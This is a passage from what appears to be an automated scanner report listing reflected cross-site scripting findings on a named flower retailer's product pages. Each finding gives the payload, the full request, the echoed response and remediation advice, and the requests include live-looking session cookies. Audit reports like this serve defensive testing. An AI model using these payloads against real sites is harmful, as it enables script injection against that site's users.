Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:39 GMT
Content-Length: 150181


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050137","30050137","30050137","428685","27","HomeNoRef141b9\\";alert(1)//08331235fa2","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e13\"%3balert(1)//07e77d7addd was submitted in the tile parameter. This input was echoed as c3e13\\";alert(1)//07e77d7addd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carouselc3e13\"%3balert(1)//07e77d7addd&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:07 GMT
Content-Length: 148302


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
tpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_carouselc3e13\\";alert(1)//07e77d7addd" != "")
           {
               s.eVar20="PFC_hmpg_carouselc3e13\\";alert(1)//07e77d7addd_";
           }
           s.eVar37=cleanString("PFC:Product:30050137_Deluxe Mother...s Day Bouquet");
           s.eVar51="HPC";
           s.events =
...[SNIP]...

4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2010f\"%3balert(1)//114dc093c72 was submitted in the trackingpgroup parameter. This input was echoed as 2010f\\";alert(1)//114dc093c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC2010f\"%3balert(1)//114dc093c72&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:11:28 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:11:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:11:28 GMT
Content-Length: 143627


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
");
           s.prop1 = cleanString("PFC:Product:30050137-DeluxeMother...sDayBouquet");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           else if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCart" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           
...[SNIP]...

4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f678a\"%3balert(1)//17f597f93ba was submitted in the Ref parameter. This input was echoed as f678a\\";alert(1)//17f597f93ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoReff678a\"%3balert(1)//17f597f93ba HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:36:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:36:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:25 GMT
Content-Length: 143975


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30008396","30008396","30008396","293461","27","HomeNoReff678a\\";alert(1)//17f597f93ba","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the tile request parameter is copied into a JavaScript rest-of-line comment. The payload 702ee%0aalert(1)//1c7004ec03a was submitted in the tile parameter. This input was echoed as 702ee
alert(1)//1c7004ec03a
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373702ee%0aalert(1)//1c7004ec03a&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:34:18 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:34:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:18 GMT
Content-Length: 142585


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
pod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a
" != "")
           {
               s.eVar20="PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS
...[SNIP]...

4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38208\"%3balert(1)//9789dc0b2fb was submitted in the trackingpgroup parameter. This input was echoed as 38208\\";alert(1)//9789dc0b2fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS38208\"%3balert(1)//9789dc0b2fb&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:31:55 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:31:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:31:56 GMT
Content-Length: 137304


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
arden");
           s.prop1 = cleanString("PFC:Product:30008396-DeluxeSucculentGarden");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           else if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCart" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           
...[SNIP]...

4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42874\"%3balert(1)//eb3bd423121 was submitted in the viewpos parameter. This input was echoed as 42874\\";alert(1)//eb3bd423121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=142874\"%3balert(1)//eb3bd423121&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
